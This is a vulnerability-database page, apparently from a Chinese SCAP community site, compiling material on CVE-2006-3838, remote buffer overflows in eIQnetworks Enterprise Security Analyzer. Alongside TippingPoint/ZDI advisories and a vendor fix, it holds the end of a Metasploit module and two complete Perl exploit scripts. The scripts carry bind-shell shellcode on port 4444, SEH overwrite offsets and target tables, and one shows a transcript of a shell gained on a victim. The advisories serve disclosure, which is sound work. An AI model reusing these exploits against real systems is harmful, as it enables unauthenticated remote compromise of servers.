			'Privileged'     => false,

			'DisclosureDate' => 'July 24 2006'

			))

			register_options(
			[
				Opt::RPORT(10616)
			], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		filler =  rand_text_english(1) * (target['Offset'] - payload.encoded.length)
		sploit =  "LICMGR_ADDLICENSE&" + filler + payload.encoded + [target.ret].pack('V') +  "&";

		sock.put(sploit)

		handler
		disconnect	
	end

end
    

- 漏洞信息 (F49114)

TSRT-06-07.txt (PacketStormID:F49114)
2006-08-18 00:00:00
Pedram Amini  zerodayinitiative.com
advisory,remote,arbitrary,vulnerability
CVE-2006-3838
[点击下载]

The eIQnetworks Enterprise Security Analyzer suffers from multiple vulnerabilities that allow remote attackers the ability to execute arbitrary code.

TSRT-06-07: eIQnetworks Enterprise Security Analyzer Monitoring Agent
            Buffer Overflow Vulnerabilities

http://www.tippingpoint.com/security/advisories/TSRT-06-07.html
August 8, 2006

-- CVE ID:
CVE-2006-3838

-- Affected Vendor:
eIQnetworks

-- Affected Products:
Enterprise Security Analyzer

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since July 31, 2006 by Digital Vaccine protection
filter ID 4386. For further product information on the TippingPoint IPS:

    http://www.tippingpoint.com 

-- Vulnerability Details:
These vulnerabilities allow remote attackers to execute arbitrary code
on vulnerable installations of eIQnetworks Enterprise Security
Analyzer. Authentication is not required to exploit these
vulnerabilities.

The first flaw specifically exists within the routines responsible for
handling user-supplied data on TCP port 9999 within Monitoring.exe.
Upon connecting to this port the user is immediately prompted for a
password. A custom string comparison loop is used to validate the
supplied password against the hard-coded value "eiq2esa?", where the
question mark represents any alpha-numeric character. Issuing the
command "HELP" reveals a number of documented commands:

   ---------------------------------------------------------
   Usage:
   QUERYMONITOR: to fetch events for a particular monitor
           QUERYMONITOR&<user>&<monid>&timer
   QUERYEVENTCOUNT or QEC: to get latest event counts
   RESETEVENTCOUNT or REC: to reset event counts
           REC&[ALL] or REC&dev1,dev2,
   STATUS: Display the running status of all the threads
   TRACE:  TRACE&ip or hostname&.  TRACE&OFF& will turn off the trace
   FLUSH: reset monitors as though the hour has changed
   ALRT-OFF and ALRT-ON: toggle the life of alerts-thread.
   RECV-OFF and RECV-ON: toggle the life of event-collection thread.
   EM-OFF and EM-ON toggle event manager
   DMON-OFF and DMON-ON toggle device event monitoring
   HMON-OFF and HMON-ON toggle host event monitoring
   NFMON-OFF and NFMON-ON toggle netflow event monitoring
   HPMON-OFF and HPMON-ON toggle host perf monitoring
   X or EXIT: to close the session
   ---------------------------------------------------------

Supplying a long string to the TRACE command results in an overflow of
the global variable at 0x004B1788. A neighboring global variable, 116
bytes after the overflowed variable, contains a file output stream
pointer that is written to every 30 seconds by a garbage collection
thread. The log message can be influenced and therefore this is a valid
exploit vector, albeit complicated. A trivial exploit vector exists
within the parsing of the actual command at the following equivalent
API call:

    sscanf(socket_data, "%[^&]&%[^&]&", 60_byte_stack_var, global_var);

Because no explicit check is made for the exact command "TRACE", an
attacker can abuse this call to sscanf by passing a long suffix to the
TRACE command that is free of the field terminating character, '&'.
This vector is trivial to exploit.

The second flaw specifically exists within the routines responsible for
handling user-supplied data on TCP port 10626 within Monitoring.exe. The
service will accept up to approximately 16K of data from unauthenticated
clients which is later parsed, in a similar fashion to above, in search
of the delimiting character '&'. Various trivial vectors of
exploitation exist, for example, through the QUERYMONITOR command.

-- Vendor Response:
eIQnetworks has issued an update to correct this vulnerability. More
details can be found at:

    http://www.eiqnetworks.com/products/enterprisesecurity/
        EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf

-- Disclosure Timeline:
2006.05.10 - Vulnerability reported to vendor
2006.07.31 - Digital Vaccine released to TippingPoint customers
2006.08.08 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Pedram Amini, TippingPoint Security
Research Team.

-- About the TippingPoint Security Research Team (TSRT):
The TippingPoint Security Research Team (TSRT) consists of industry
recognized security researchers that apply their cutting-edge
engineering, reverse engineering and analysis talents in our daily
operations. More information about the team is available at:

    http://www.tippingpoint.com/security
 
The by-product of these efforts fuels the creation of vulnerability
filters that are automatically delivered to our customers' intrusion
prevention systems through the Digital Vaccine(R) service.
    

- 漏洞信息 (F48651)

eIQ-ESA.txt (PacketStormID:F48651)
2006-07-28 00:00:00
Kevin Finisterre  digitalmunition.com
exploit,remote,tcp
CVE-2006-3838
[点击下载]

Remote exploit for the Syslog server by eIQnetworks that has a vulnerability when processing long strings transmitted to its TCP port.

#!/usr/bin/perl -w
# 
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006
# Bug found by KF of digitalmunition.com.
#
# http://www.zerodayinitiative.com/advisories/ZDI-06-023.html
#
# Exploit for * Syslog Server by eiQnetworks  (OEM for Several vendors)
#
# There MUST be a syslog service listening on port 12345 for this to work. The syslog service is not enabled by default
#
# Currently borked... This shit overwrites the SEH on XP SP1. It just needs good shellcode. perhaps a reverse style jmp instead of a 
# forward jump. This would eliminate the need for 2 stages of shellcode. .  
#
#SEH chain of thread 00000FF4
#Address    SE handler
#013ECEF8   FWASyslo.00449EDB
#013EFF78   WS2HELP.71AA15CF   <-------- I set this address. 
#
#013EFF74   90909090
#013EFF78   909032EB  Pointer to next SEH record  <--- I set this. 
#013EFF7C   71AA15CF  SE handler   <--- pop pop ret 
#013EFF80   90909090
#
#71AA15CF   5F               POP EDI
#71AA15D0   5D               POP EBP
#71AA15D1   C2 0800          RETN 8
#
# View the SEH Chain and set a break on the address of the JMP code. This will let you debug the stage one shellcode.
#
use IO::Socket;

$bufsize = 4096; 

$hostname = "127.0.0.1";
$nextserec = pack("l", (0xEB069090)); # jmp short +0x06
$sehandler = pack("V", (0x71abe325)); # pop edi, pop ebp, retn - ws2help.dll  (Send this reversed note the 'V')

# Binary hunts performed by JxT and Titon
$tgts{"0"} = "G2SRv4.0.36.exe:932"; # Use length to SEH overwrite. 

unless (($target,$hostname) = @ARGV,$hostname) {

        print "\n        Syslog by eiQnetworks exploit, kf \(kf_lists[at]digitalmunition[dot]com\) - 03/23/2006\n";
        print "\n\nUsage: $0 <target> <host>\n\nTargets:\n\n";

        foreach $key (sort(keys %tgts)) {
                ($a,$b) = split(/\:/,$tgts{"$key"});
                print "\t$key . $a\n";
        }

        print "\n";
        exit 1;
}


($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a, Len: $b\n";

# Stage 2 shellcode can be up to Length of SEH overwrite. 
$sc2 = 
# win32_bind -  EXITFUNC=seh LPORT=4444 
# Size=344 Encoder=PexFnstenvSub http://metasploit.com
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2".
"\xfa\xa1\x2c\x83\xeb\xfc\xe2\xf4\x4e\x90\x4a\x61\x5a\x03\x5e\xd3".
"\x4d\x9a\x2a\x40\x96\xde\x2a\x69\x8e\x71\xdd\x29\xca\xfb\x4e\xa7".
"\xfd\xe2\x2a\x73\x92\xfb\x4a\x65\x39\xce\x2a\x2d\x5c\xcb\x61\xb5".
"\x1e\x7e\x61\x58\xb5\x3b\x6b\x21\xb3\x38\x4a\xd8\x89\xae\x85\x04".
"\xc7\x1f\x2a\x73\x96\xfb\x4a\x4a\x39\xf6\xea\xa7\xed\xe6\xa0\xc7".
"\xb1\xd6\x2a\xa5\xde\xde\xbd\x4d\x71\xcb\x7a\x48\x39\xb9\x91\xa7".
"\xf2\xf6\x2a\x5c\xae\x57\x2a\x6c\xba\xa4\xc9\xa2\xfc\xf4\x4d\x7c".
"\x4d\x2c\xc7\x7f\xd4\x92\x92\x1e\xda\x8d\xd2\x1e\xed\xae\x5e\xfc".
"\xda\x31\x4c\xd0\x89\xaa\x5e\xfa\xed\x73\x44\x4a\x33\x17\xa9\x2e".
"\xe7\x90\xa3\xd3\x62\x92\x78\x25\x47\x57\xf6\xd3\x64\xa9\xf2\x7f".
"\xe1\xa9\xe2\x7f\xf1\xa9\x5e\xfc\xd4\x92\xb0\x70\xd4\xa9\x28\xcd".
"\x27\x92\x05\x36\xc2\x3d\xf6\xd3\x64\x90\xb1\x7d\xe7\x05\x71\x44".
"\x16\x57\x8f\xc5\xe5\x05\x77\x7f\xe7\x05\x71\x44\x57\xb3\x27\x65".
"\xe5\x05\x77\x7c\xe6\xae\xf4\xd3\x62\x69\xc9\xcb\xcb\x3c\xd8\x7b".
"\x4d\x2c\xf4\xd3\x62\x9c\xcb\x48\xd4\x92\xc2\x41\x3b\x1f\xcb\x7c".
"\xeb\xd3\x6d\xa5\x55\x90\xe5\xa5\x50\xcb\x61\xdf\x18\x04\xe3\x01".
"\x4c\xb8\x8d\xbf\x3f\x80\x99\x87\x19\x51\xc9\x5e\x4c\x49\xb7\xd3".
"\xc7\xbe\x5e\xfa\xe9\xad\xf3\x7d\xe3\xab\xcb\x2d\xe3\xab\xf4\x7d".
"\x4d\x2a\xc9\x81\x6b\xff\x6f\x7f\x4d\x2c\xcb\xd3\x4d\xcd\x5e\xfc".
"\x39\xad\x5d\xaf\x76\x9e\x5e\xfa\xe0\x05\x71\x44\x42\x70\xa5\x73".
"\xe1\x05\x77\xd3\x62\xfa\xa1\x2c";

# Stage 1 shellcode can only be 128 butes. 
# 12 byte Nop find code by skylined?  This is bullshit right now... it does not hunt for the right shit. 
$sc1 = "\x5f\x54\x90\xb8\x90\x90\xfc\x90\xaf\xf2\xc3\x57";

# for XP SP1  
#  <nops> <stage 2 shellcode><jmp code> <pop pop ret> <nops> <128 byte or less stage 1 shellcode> 

# Should total 4096
$buf = "\x90" x ($b - length($sc2)) . $sc2 . $nextserec  . $sehandler . "\x90" x (128 - length($sc1)) . $sc1 . "\x58" x ($bufsize-$b-8-128);  

print "Exploiting $hostname\n";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$hostname, PeerPort=>12345, Type=>SOCK_STREAM);

$sock or die "no socket :$!\n"; 

print $sock "$buf";
close $sock;

    

- 漏洞信息 (F48650)

eIQ-LM-3.txt (PacketStormID:F48650)
2006-07-28 00:00:00
Kevin Finisterre  digitalmunition.com
exploit,remote,overflow
CVE-2006-3838
[点击下载]

Remote exploit for the buffer overflow found in the LICMGR_ADDLICENSE Field of EIQ networks network analyzer.

#!/usr/bin/perl -w
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006
# Bug found by Titon of Bastard Labs.
#
# http://www.zerodayinitiative.com/advisories/ZDI-06-024.html
#
# Exploit for * Security Analyzer by eiQnetworks  (OEM for Several vendors)
#
# kfinisterre@kfinisterre01:~$  ./eiQ_multi.pl 2 192.168.0.13
# *** Target: NetworkSecurityAnalyzerv4.2.27.exe, Len: 1262
# Exploiting 192.168.0.13
# kfinisterre@kfinisterre01:~$ telnet 192.168.0.13 4444
# Trying 192.168.0.13...
# Connected to 192.168.0.13.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Network Security Analyzer\fwa>exit
# exit
# Connection closed by foreign host.

use IO::Socket;
$hostname = "127.0.0.1";
$retval = 0x71ab773b; # jmp EBX on WinXP SP2 ws2_32.dll (metasploit)
#$retval = 0x750316e2; # call EBX on Windows 2000 SP4 ws2_32.dll (metasploit)

# Binary hunts performed by JxT and Titon
$tgts{"0"} = "G2SRv4.0.36.exe:1262";
$tgts{"1"} = "EnterpriseSecurityAnalyzerv21.exe:494";
$tgts{"2"} = "NetworkSecurityAnalyzerv4.2.27.exe:1262";
$tgts{"3"} = "NetworkSecurityAnalyzerv5.exe:1262";
$tgts{"4"} = "FortiReporter_4.2.26.exe:1262";
$tgts{"5"} = "AstaroReportManagerV37.exe:000";  # Unknown.. need serial
$tgts{"6"} = "AstaroReportManager_4.2.29.exe:1262";

unless (($target,$hostname) = @ARGV,$hostname) {

        print "\n        Security Analyzer by eiQnetworks exploit, kf \(kf_lists[at]digitalmunition[dot]com\) - 03/23/2006\n";
        print "\n\nUsage: $0 <target> <host>\n\nTargets:\n\n";

        foreach $key (sort(keys %tgts)) {
                ($a,$b) = split(/\:/,$tgts{"$key"});
                print "\t$key . $a\n";
        }

        print "\n";
        exit 1;
}

$ret = pack("l", ($retval));
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a, Len: $b\n";

$sc = 
# win32_bind -  EXITFUNC=seh LPORT=4444 
# Size=344 Encoder=PexFnstenvSub http://metasploit.com
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2".
"\xfa\xa1\x2c\x83\xeb\xfc\xe2\xf4\x4e\x90\x4a\x61\x5a\x03\x5e\xd3".
"\x4d\x9a\x2a\x40\x96\xde\x2a\x69\x8e\x71\xdd\x29\xca\xfb\x4e\xa7".
"\xfd\xe2\x2a\x73\x92\xfb\x4a\x65\x39\xce\x2a\x2d\x5c\xcb\x61\xb5".
"\x1e\x7e\x61\x58\xb5\x3b\x6b\x21\xb3\x38\x4a\xd8\x89\xae\x85\x04".
"\xc7\x1f\x2a\x73\x96\xfb\x4a\x4a\x39\xf6\xea\xa7\xed\xe6\xa0\xc7".
"\xb1\xd6\x2a\xa5\xde\xde\xbd\x4d\x71\xcb\x7a\x48\x39\xb9\x91\xa7".
"\xf2\xf6\x2a\x5c\xae\x57\x2a\x6c\xba\xa4\xc9\xa2\xfc\xf4\x4d\x7c".
"\x4d\x2c\xc7\x7f\xd4\x92\x92\x1e\xda\x8d\xd2\x1e\xed\xae\x5e\xfc".
"\xda\x31\x4c\xd0\x89\xaa\x5e\xfa\xed\x73\x44\x4a\x33\x17\xa9\x2e".
"\xe7\x90\xa3\xd3\x62\x92\x78\x25\x47\x57\xf6\xd3\x64\xa9\xf2\x7f".
"\xe1\xa9\xe2\x7f\xf1\xa9\x5e\xfc\xd4\x92\xb0\x70\xd4\xa9\x28\xcd".
"\x27\x92\x05\x36\xc2\x3d\xf6\xd3\x64\x90\xb1\x7d\xe7\x05\x71\x44".
"\x16\x57\x8f\xc5\xe5\x05\x77\x7f\xe7\x05\x71\x44\x57\xb3\x27\x65".
"\xe5\x05\x77\x7c\xe6\xae\xf4\xd3\x62\x69\xc9\xcb\xcb\x3c\xd8\x7b".
"\x4d\x2c\xf4\xd3\x62\x9c\xcb\x48\xd4\x92\xc2\x41\x3b\x1f\xcb\x7c".
"\xeb\xd3\x6d\xa5\x55\x90\xe5\xa5\x50\xcb\x61\xdf\x18\x04\xe3\x01".
"\x4c\xb8\x8d\xbf\x3f\x80\x99\x87\x19\x51\xc9\x5e\x4c\x49\xb7\xd3".
"\xc7\xbe\x5e\xfa\xe9\xad\xf3\x7d\xe3\xab\xcb\x2d\xe3\xab\xf4\x7d".
"\x4d\x2a\xc9\x81\x6b\xff\x6f\x7f\x4d\x2c\xcb\xd3\x4d\xcd\x5e\xfc".
"\x39\xad\x5d\xaf\x76\x9e\x5e\xfa\xe0\x05\x71\x44\x42\x70\xa5\x73".
"\xe1\x05\x77\xd3\x62\xfa\xa1\x2c";

$nops = "A" x ($b - length($sc));
$buf = "LICMGR_ADDLICENSE&" . $nops . $sc . $ret . "&";

printf "Exploiting $hostname\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$hostname, PeerPort=>10616, Type=>SOCK_STREAM);
$sock or die "no socket :$!\n"; 

print $sock "$buf";
print "Try connecting to port 4444 on the target.\n";
    

- 漏洞信息 (F48592)

TSRT-06-04.txt (PacketStormID:F48592)
2006-07-26 00:00:00
 
advisory,overflow,tcp
CVE-2006-3838
[点击下载]

A vulnerability exists in the IQnetworks Enterprise Security Analyzer. The specific flaw exists within Topology.exe, which binds by default to TCP port 10628. During the processing of long prefixes to the GUIADDDEVICE, ADDDEVICE, or DELETEDEVICE command, a stack based buffer overflow occurs.

TSRT-06-04: eIQnetworks Enterprise Security Analyzer Topology Server
            Buffer Overflow Vulnerability

http://www.zerodayinitiative.com/advisories/TSRT-06-04.html
July 25, 2006

-- CVE ID:
CVE-2006-3838

-- Affected Vendor:
eIQnetworks

-- Affected Products:
eIQnetworks Enterprise Security Analyzer
Astaro Report Manager (OEM)
Fortinet FortiReporter (OEM)
iPolicy Security Reporter (OEM)
SanMina Viking Multi-Log Manager (OEM)
Secure Computing G2 Security Reporter (OEM)
Top Layer Network Security Analyzer (OEM)

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since July 24, 2006 by Digital Vaccine protection
filter ID 4500. For further product information on the TippingPoint IPS:

    http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of eIQnetworks Enterprise Security Analyzer.
Authentication is not required to exploit this vulnerability.

The specific flaw exists within Topology.exe, which binds by default to
TCP port 10628. During the processing of long prefixes to the
GUIADDDEVICE, ADDDEVICE, or DELETEDEVICE command, a stack based buffer
overflow occurs.

-- Vendor Response:
eIQnetworks has issued an update to correct this vulnerability. More
details can be found at:

    http://www.eiqnetworks.com/products/enterprisesecurity/
           EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf

-- Disclosure Timeline:
2006.05.10 - Vulnerability reported to vendor
2006.07.24 - Digital Vaccine released to TippingPoint customers
2006.07.25 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Cody Pierce, TippingPoint Security
Research Team.

-- About the TippingPoint Security Research Team (TSRT):
The TippingPoint Security Research Team (TSRT) consists of industry
recognized security researchers that apply their cutting-edge
engineering, reverse engineering and analysis talents in our daily
operations. More information about the team is available at:

    http://www.tippingpoint.com/security
 
The by-product of these efforts fuels the creation of vulnerability
filters that are automatically delivered to our customers' intrusion
prevention systems through the Digital Vaccine(R) service.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息 (F48591)

TSRT-06-03.txt (PacketStormID:F48591)
2006-07-26 00:00:00
 
advisory,tcp
CVE-2006-3838
[点击下载]

A vulnerability exists in the IQnetworks Enterprise Security Analyzer. The flaw specifically exists within the Syslog daemon, syslogserver.exe, during the processing of long arguments passed through various commands on TCP port 10617.

TSRT-06-03: eIQnetworks Enterprise Security Analyzer Syslog Server
            Buffer Overflow Vulnerabilities

http://www.zerodayinitiative.com/advisories/TSRT-06-03.html
July 25, 2006

-- CVE ID:
CVE-2006-3838

-- Affected Vendor:
eIQnetworks

-- Affected Products:
eIQnetworks Enterprise Security Analyzer
Astaro Report Manager (OEM)
Fortinet FortiReporter (OEM)
iPolicy Security Reporter (OEM)
SanMina Viking Multi-Log Manager (OEM)
Secure Computing G2 Security Reporter (OEM)
Top Layer Network Security Analyzer (OEM)

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since July 24, 2006 by Digital Vaccine protection
filter ID 4319. For further product information on the TippingPoint IPS:

    http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of eIQnetworks Enterprise Security Analyzer.
Authentication is not required to exploit this vulnerability.

The flaw specifically exists within the Syslog daemon,
syslogserver.exe, during the processing of long arguments passed
through various commands on TCP port 10617. The following commands are
known to be affected:

    DELTAINTERVAL
    LOGFOLDER
    DELETELOGS
    FWASERVER
    SYSLOGPUBLICIP
    GETFWAIMPORTLOG
    GETFWADELTA
    DELETERDEPDEVICE
    COMPRESSRAWLOGFILE
    GETSYSLOGFIREWALLS
    ADDPOLICY
    EDITPOLICY

The majority of the above cases result in a stack overflow and are
trivial to exploit.

-- Vendor Response:
eIQnetworks has issued an update to correct this vulnerability. More
details can be found at:

    http://www.eiqnetworks.com/products/enterprisesecurity/
           EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf

-- Disclosure Timeline:
2006.05.10 - Vulnerability reported to vendor
2006.07.24 - Digital Vaccine released to TippingPoint customers
2006.07.25 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Cody Pierce, TippingPoint Security
Research Team.

-- About the TippingPoint Security Research Team (TSRT):
The TippingPoint Security Research Team (TSRT) consists of industry
recognized security researchers that apply their cutting-edge
engineering, reverse engineering and analysis talents in our daily
operations. More information about the team is available at:

    http://www.tippingpoint.com/security
 
The by-product of these efforts fuels the creation of vulnerability
filters that are automatically delivered to our customers' intrusion
prevention systems through the Digital Vaccine(R) service.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息 (F48586)

Zero Day Initiative Advisory 06-024 (PacketStormID:F48586)
2006-07-26 00:00:00
Tipping Point  zerodayinitiative.com
advisory,overflow,tcp
CVE-2006-3838
[点击下载]

A vulnerability exists in the IQnetworks Enterprise Security Analyzer. The specific flaw exists within EnterpriseSecurityAnalyzer.exe, which binds by default to TCP port 10616. During the processing of long arguments to the LICMGR_ADDLICENSE command a stack based buffer overflow occurs.

ZDI-06-024: eIQnetworks Enterprise Security Analyzer License Manager 
Buffer Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-024.html
July 25, 2006

-- CVE ID:
CVE-2006-3838

-- Affected Vendor:
eIQnetworks

-- Affected Products:
eIQnetworks Enterprise Security Analyzer
Astaro Report Manager (OEM)
Fortinet FortiReporter (OEM)
iPolicy Security Reporter (OEM)
SanMina Viking Multi-Log Manager (OEM)
Secure Computing G2 Security Reporter (OEM)
Top Layer Network Security Analyzer (OEM)

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since July 24, 2006 by Digital Vaccine protection
filter ID 4318. For further product information on the TippingPoint IPS:

    http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of eIQnetworks Enterprise Security Analyzer.
Authentication is not required to exploit this vulnerability.

The specific flaw exists within EnterpriseSecurityAnalyzer.exe, which
binds by default to TCP port 10616. During the processing of long
arguments to the LICMGR_ADDLICENSE command a stack based buffer
overflow occurs.

-- Vendor Response:
eIQnetworks has issued an update to correct this vulnerability. More
details can be found at:

 
http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf

-- Disclosure Timeline:
2006.05.10 - Vulnerability reported to vendor
2006.07.24 - Digital Vaccine released to TippingPoint customers
2006.07.25 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Titon, JxT, KF and the rest of 
Bastard Labs.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息 (F48585)

Zero Day Initiative Advisory 06-023 (PacketStormID:F48585)
2006-07-26 00:00:00
Tipping Point  zerodayinitiative.com
advisory,udp,tcp
CVE-2006-3838
[点击下载]

A vulnerability exists in the IQnetworks Enterprise Security Analyzer. The specific flaw exists within the Syslog daemon, syslogserver.exe, during the processing of long strings transmitted to the listening TCP port. The vulnerability is not exposed over UDP. The default configuration does not expose the open TCP port.

ZDI-06-023: eIQnetworks Enterprise Security Analyzer Syslog Server Buffer 
Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-023.html
July 25, 2006

-- CVE ID:
CVE-2006-3838

-- Affected Vendor:
eIQnetworks

-- Affected Products:
eIQnetworks Enterprise Security Analyzer
Astaro Report Manager (OEM)
Fortinet FortiReporter (OEM)
iPolicy Security Reporter (OEM)
SanMina Viking Multi-Log Manager (OEM)
Secure Computing G2 Security Reporter (OEM)
Top Layer Network Security Analyzer (OEM)

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since  by Digital Vaccine protection
filter ID N/A. For further product information on the TippingPoint IPS:

    http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of eIQnetworks Enterprise Security Analyzer.
Authentication is not required to exploit this vulnerability.

The specific flaw exists within the Syslog daemon, syslogserver.exe,
during the processing of long strings transmitted to the listening TCP
port. The vulnerability is not exposed over UDP. The default
configuration does not expose the open TCP port.

-- Vendor Response:
eIQnetworks has issued an update to correct this vulnerability. More
details can be found at:

 
http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf

-- Disclosure Timeline:
2006.05.10 - Vulnerability reported to vendor
 - Digital Vaccine released to TippingPoint customers
2006.07.25 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Titon, JxT, KF and the rest of 
Bastard Labs.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息

27525
eIQnetworks Enterprise Security Analyzer syslogserver.exe Pre-authentication Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Private

- 漏洞描述

A remote overflow exists in eIQnetworks Enterprise Security Analyzer. The Syslog daemon (syslogserver.exe) fails to perform proper bounds checking on the listening TCP port requests resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.

- 时间线

2006-07-25 2006-05-10
Unknow Unknow

- 解决方案

Upgrade to version 2.5.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

eIQnetworks Enterprise Security Analyzer Topology Server Remote Buffer Overflow Vulnerability
Boundary Condition Error 19164
Yes No
2006-07-26 12:00:00 2008-02-01 08:17:00
Discovered by Cody Pierce.

- 受影响的程序版本

Top Layer Network Security Analyzer 0
Secure Computing G2 Security reporter 0
SanMina Viking Multi-Log Manager 0
Fortinet FortiReporter 0
eIQnetworks Enterprise Security Analyzer 2.1
eIQnetworks Enterprise Security Analyzer 2.0
Astaro Report Manager 0
iPolicy Security Reporter 0
eIQnetworks Enterprise Security Analyzer 2.5

- 不受影响的程序版本

iPolicy Security Reporter 0
eIQnetworks Enterprise Security Analyzer 2.5

- 漏洞讨论

eIQnetworks Enterprise Security Analyzer Topology Server is prone to a remote buffer-overflow vulnerability.

This issue can facilitate a remote compromise due to arbitrary code execution.

Enterprise Security Analyzer versions prior to 2.5.0 are vulnerable. OEM vendors' versions prior to 4.6 are also vulnerable.

- 漏洞利用

The following exploit code is available as a module for the Metasploit Framework:

- 解决方案

The vendor has released version 2.5.0 to address this issue. Please contact the vendor for details.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站